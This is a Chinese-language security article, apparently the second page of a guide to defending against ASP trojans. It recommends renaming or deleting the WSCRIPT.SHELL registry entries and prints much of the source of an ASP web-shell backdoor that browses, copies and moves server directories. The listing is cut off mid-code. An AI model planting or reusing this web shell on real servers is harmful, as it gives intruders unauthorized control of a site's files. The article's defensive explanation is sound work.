科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道两款比较典型的ASP木马防范方法(2)

两款比较典型的ASP木马防范方法(2)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

随着ASP技术的发展,网络上基于ASP技术开发的网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。
  • 评论
  • 分享微博
  • 分享邮件

  对于防范方法让我们看一下它的代码就知道了:
  
  Set oScript = Server.CreateObject("WSCRIPT.SHELL") "建立了一个名为oScript的WSCRIPT.SHELL对象,用于命令的执行"
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  
  上面三行代码创建了WSCRIPT.SHELL、WSCRIPT.NETWORK、Scripting.FileSystemObject三个对象,我们只要在注册表中把控制WSCRIPT.SHELL对象的项改名或删除就可以了。如下图:值得注意的是:我们应该把“WSCRIPT.SHELL”项和“WSCRIPT.SHELL.1”这两项都要改名或删除。因为如我们只修改“WSCRIPT.SHELL”项的话。那么黑客们只要把代码修改如下:Set oScript = Server.CreateObject("WSCRIPT.SHELL.1") 这个后门木马就又可以执行了。
  
  大家可能已经想到了,我们在对“WSCRIPT.SHELL”项和“WSCRIPT.SHELL.1”改名时,一定要不容易被黑客们猜到,因为例如:你把“WSCRIPT.SHELL”改成了“WSCRIPT.SHELL888”。黑客们只要把代码相应的改成:Set oScript = Server.CreateObject("WSCRIPT.SHELL888"),木马程序就又可以执行了。还有就修改了注册表以后要重起WEB服务,设置才会有效。
  
  接下来让我们再来看下一款ASP后门木马程序的代码:
  
  <%response.write "<font size=6 color=red>一次只能执行一个xx作</font>" %>
  <%response.write now()%><BR>程序所在的物理路径:
  <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
  <html>
  <title>asps shell.application backdoor </title>
  <body>
  <form action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=text value="<%=szCMD %>"> 输入要浏览的目录<br>
  <input type=text name=text1 value="<%=szCMD1 %>">
  copy
  <input type=text name=text2 value="<%=szCMD2 %>"><br>
  <input type=text name=text3 value="<%=szCMD3 %>">
  move
  <input type=text name=text4 value="<%=szCMD4 %>"><br>
  路径:<input type=text name=text5 value="<%=szCMD5 %>">
  程序:<input type=text name=text6 value="<%=szCMD6 %>"><br>
  <input type=submit name=sb value=发送命令>
  </form>
  </body>
  </html>
  <%
  szCMD = Request.Form("text") 目录浏览
  if (szCMD <> "") then
  set shell=server.createobject("shell.application") 建立shell对象
  set fod1=shell.namespace(szcmd)
  set foditems=fod1.items
  for each co in foditems
  response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
  next
  end if
  %> <%

    szCMD1 = Request.Form("text1") 目录拷贝,不能进行文件拷贝
  szCMD2 = Request.Form("text2")
  if szcmd1<>"" and szcmd2<>"" then
  set shell1=server.createobject("shell.application") 建立shell对象
  set fod1=shell1.namespace(szcmd2)
  for i=len(szcmd1) to 1 step -1
  if mid(szcmd1,i,1)="" then
  path=left(szcmd1,i-1)
  exit for
  end if
  next
  if len(path)=2 then path=path & ""
  path2=right(szcmd1,len(szcmd1)-i)
  set fod2=shell1.namespace(path)
  set foditem=fod2.parsename(path2)
  fod1.copyhere foditem
  response.write "command completed success!"
  end if
  %> <%
  szCMD3 = Request.Form("text3") 目录移动
  szCMD4 = Request.Form("text4")
  if szcmd3<>"" and szcmd4<>"" then
  set shell2=server.createobject("shell.application") 建立shell对象
  set fod1=shell2.namespace(szcmd4) for i=len(szcmd3) to 1 step -1
  if mid(szcmd3,i,1)="" then
  path=left(szcmd3,i-1)
  exit for
  end if

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章